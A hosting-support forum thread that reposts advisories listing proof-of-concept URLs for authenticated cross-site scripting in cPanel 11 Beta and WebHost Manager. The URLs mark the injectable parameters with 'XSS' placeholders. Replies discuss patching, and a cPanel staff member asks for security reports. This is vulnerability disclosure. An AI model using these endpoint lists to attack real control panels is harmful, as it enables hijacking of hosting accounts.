CPanel 11 Beta Multiple Cross-Site Scripting

ehostcoua

Registered
Nov 4, 2006
1
0
151
#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 11 Beta
#Poc:
#
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
http://target:2082/frontend/x/files/createdir.html?dir=XSS
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
http://target:2082/frontend/x/err/erredit.html?dir=XSS
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://target:2082/frontend/x/files/createfile.html?dir=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]




#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory:
#http://www.aria-security.com/forum/showthread.php?t=44
#-----------------------------------------------------------
#Software: WebHost Manager (WHM)
#Tested WHM X v3.1.0 (demo.cpanel.net)
#Poc:
#
http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS
http://target:2086/cgi/addon_config...layusersubject=1&type=redirect&supporturl=XSS
http://target:2086/scripts/editpkg?pkg=XSS
http://target2086/scripts2/domts2?domain=XSS
http://target:2086/scripts/editzone?domain=XSS
http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS
http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]
 

carluk

Well-Known Member
Sep 2, 2003
162
0
166
It's in edge at the moment as far as I can see. These problems are being fixed when reported (see change log) although worrying that they are there in the first place. Security is an especially high priority at cpanel given the recent problems according to a recent post by a cpanel guy on WHT - give that what authority you will.

It should also be noted that people in glass houses should not throw stones. :)
 

cPanelDavidG

Technical Product Specialist
Nov 29, 2006
11,216
11
313
Houston, TX
cPanel Access Level
Root Administrator
Security is a top priority here at cPanel and I would encourage anyone who stumbles across any security issues (not just XSS vulnerabilities) to submit them to [email protected]

In defense of the development team, I do know that they frequently look at and act upon reports from those particular websites. It is also important to note that cPanel 11 is not yet intended for production systems. If it was, we would be pushing the update out VIA Layer2 to upgrade everyone automatically (who has cPanel automatic update enabled).

It's better to be sterilizing cPanel 11 of security flaws now than when it hits production environments.